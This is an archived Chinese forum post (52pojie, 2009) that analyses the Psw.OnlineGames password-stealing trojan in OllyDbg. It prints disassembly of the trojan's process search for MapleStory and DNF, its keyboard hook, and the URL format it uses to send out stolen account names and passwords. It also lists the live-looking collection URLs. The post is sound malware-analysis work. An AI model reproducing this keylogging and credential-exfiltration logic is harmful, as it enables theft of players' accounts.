Psw.OnlineGames

xiaopeng018 发表于 2009-11-9 13:55

病毒名称：Psw.OnlineGames
病毒类型：特洛伊木马
文件 MD5：34e9fe75d59053fcddc92b88ab1cc012
公开范围：完全公开
危害等级：3
文件长度：55,296 字节

OD简单分析：
1、初始：
1000C85F 56          push esi
1000C860 8B7424 08    mov esi,dword ptr ss:
1000C864 56          push esi
1000C865 FF15 68100010 call dword ptr ds:                      ; kernel32.DisableThreadLibraryCalls
1000C86B 8B4424 0C    mov eax,dword ptr ss:
1000C86F 83E8 00       sub eax,0
1000C872 74 10       je short cao110_d.1000C884
1000C874 48          dec eax
1000C875 75 41       jnz short cao110_d.1000C8B8
1000C877 8935 64E80010 mov dword ptr ds:,esi
1000C87D E8 37FFFFFF call cao110_d.1000C7B9                            ; 关键call

2、获得系统版本：
1000C6C5 55          push ebp
1000C6C6 8BEC          mov ebp,esp
1000C6C8 81EC A0010000 sub esp,1A0
1000C6CE 6A 61       push 61
1000C6D0 FF15 C8100010 call dword ptr ds:                      ; USER32.VkKeyScanA
1000C6D6 66:3D 4100    cmp ax,41
1000C6DA 74 01       je short cao110_d.1000C6DD
1000C6DC CC          int3
1000C6DD 56          push esi
1000C6DE 57          push edi
1000C6DF BE 9C000000 mov esi,9C
1000C6E4 33FF          xor edi,edi
1000C6E6 56          push esi
1000C6E7 8D85 64FFFFFF lea eax,dword ptr ss:
1000C6ED 57          push edi
1000C6EE 50          push eax
1000C6EF E8 C6020000 call cao110_d.1000C9BA
1000C6F4 8D85 64FFFFFF lea eax,dword ptr ss:
1000C6FA 89B5 64FFFFFF mov dword ptr ss:,esi
1000C700 8B35 64100010 mov esi,dword ptr ds:                   ; kernel32.GetVersionExA

3、获得系统目录，打开explorer，获得大小后关闭句柄
1000C74A 68 04010000 push 104
1000C74F 50          push eax
1000C750 FF15 60100010 call dword ptr ds:       ; kernel32.GetWindowsDirectoryA
1000C756 8D85 60FEFFFF lea eax,dword ptr ss:
1000C75C 68 64A60010 push cao110_d.1000A664             ; ASCII "\explorer.exe"
1000C761 50          push eax
1000C762 E8 0A020000 call cao110_d.1000C971
1000C767 57          push edi
1000C768 68 80000000 push 80
1000C76D 6A 03       push 3
1000C76F 57          push edi
1000C770 6A 01       push 1
1000C772 8D85 60FEFFFF lea eax,dword ptr ss:
1000C778 68 00000080 push 80000000
1000C77D 50          push eax
1000C77E FF15 4C100010 call dword ptr ds:       ; kernel32.CreateFileA
1000C784 8BF0          mov esi,eax
1000C786 83FE FF       cmp esi,-1
1000C789 74 1E       je short cao110_d.1000C7A9
1000C78B 57          push edi
1000C78C 56          push esi
1000C78D FF15 5C100010 call dword ptr ds:       ; kernel32.GetFileSize
1000C793 56          push esi
1000C794 8BF8          mov edi,eax
1000C796 FF15 8C100010 call dword ptr ds:       ; kernel32.CloseHandle

4、开始找游戏进程：冒险岛，DNF，winbaram（不知道这个是啥游戏）

1000B9B7 81EC 04010000 sub esp,104
1000B9BD 56          push esi
1000B9BE 8D85 FCFEFFFF lea eax,dword ptr ss:
1000B9C4 68 04010000 push 104
1000B9C9 50          push eax
1000B9CA 8BF1          mov esi,ecx
1000B9CC 6A 00       push 0
1000B9CE FF15 14100010 call dword ptr ds:       ; kernel32.GetModuleFileNameA
1000B9D4 8D85 FCFEFFFF lea eax,dword ptr ss:
1000B9DA 6A 5C       push 5C
1000B9DC 50          push eax
1000B9DD E8 4A0F0000 call cao110_d.1000C92C
1000B9E2 40          inc eax
1000B9E3 68 E8120010 push cao110_d.100012E8             ; ASCII "maplestory.exe"（冒险岛进程）

用的比较多的字符串比较：
1000C8C9 40          inc eax
1000C8CA 803C08 00    cmp byte ptr ds:,0
1000C8CE^ 75 F9       jnz short cao110_d.1000C8C9

5、设置键盘钩子发送到asp地址
键盘钩子创建消息：
1000B8BC 6A 00       push 0
1000B8BE FF35 5CE70010 push dword ptr ds:          ; dumped_.10000000
1000B8C4 68 B0B60010 push dumped_.1000B6B0
1000B8C9 6A 02       push 2
1000B8CB FF15 C0100010 call dword ptr ds:[<&user32.SetWindowsHo>; USER32.SetWindowsHookExA
1000B8D1 A3 F4E60010 mov dword ptr ds:,eax

冒险岛：http://www.gwlove123.com/small/mxd/lin.asp
DNF：http://www.gwlove123.com/small/df/lin.asp
FZ：http://www.zdd2626.net/test/fz/lin.asp

1000B04D 50          push eax
1000B04E E8 EE1A0000 call dumped_.1000CB41
1000B053 85C0          test eax,eax
1000B055 0F84 8A000000 je dumped_.1000B0E5
1000B05B 381D 84E20010 cmp byte ptr ds:,bl
1000B061 BF 84E20010 mov edi,dumped_.1000E284
1000B066 BE 64E10010 mov esi,dumped_.1000E164
1000B06B 75 32       jnz short dumped_.1000B09F
1000B06D 381D 64E10010 cmp byte ptr ds:,bl
1000B073 75 2A       jnz short dumped_.1000B09F
1000B075 8D45 80       lea eax,dword ptr ss:
1000B078 50          push eax
1000B079 FF35 70110010 push dword ptr ds:          ; dumped_.1000117C
1000B07F E8 C31B0000 call dumped_.1000CC47
1000B084 85C0          test eax,eax
1000B086 74 5D       je short dumped_.1000B0E5
1000B088 8D45 80       lea eax,dword ptr ss:
1000B08B 50          push eax
1000B08C 57          push edi
1000B08D E8 8E210000 call dumped_.1000D220
1000B092 8D45 A0       lea eax,dword ptr ss:
1000B095 50          push eax
1000B096 56          push esi
1000B097 E8 84210000 call dumped_.1000D220
1000B09C 83C4 10       add esp,10
1000B09F 381D A4E20010 cmp byte ptr ds:,bl
1000B0A5 75 05       jnz short dumped_.1000B0AC
1000B0A7 E8 01020000 call dumped_.1000B2AD
1000B0AC 68 ECE20010 push dumped_.1000E2EC
1000B0B1 56          push esi
1000B0B2 57          push edi
1000B0B3 68 A4E20010 push dumped_.1000E2A4
1000B0B8 8D85 7CFEFFFF lea eax,dword ptr ss:
1000B0BE 68 C4E20010 push dumped_.1000E2C4
1000B0C3 50          push eax
1000B0C4 8D85 7CFAFFFF lea eax,dword ptr ss:
1000B0CA 68 E4110010 push dumped_.100011E4                ; ASCII "%s?a=%s&s=%s&u=%s&p=%s&sp=%s";发送格式
1000B0CF 50          push eax
1000B0D0 FF15 CC100010 call dword ptr ds:[<&user32.wsprintfA>]; USER32.wsprintfA

ps:简单分析，如有失误，请多多指点。o(∩_∩)o...

miaoronghua 发表于 2009-12-2 13:46

页: [1]

吾爱破解 - 52pojie.cn's Archiver

Psw.OnlineGames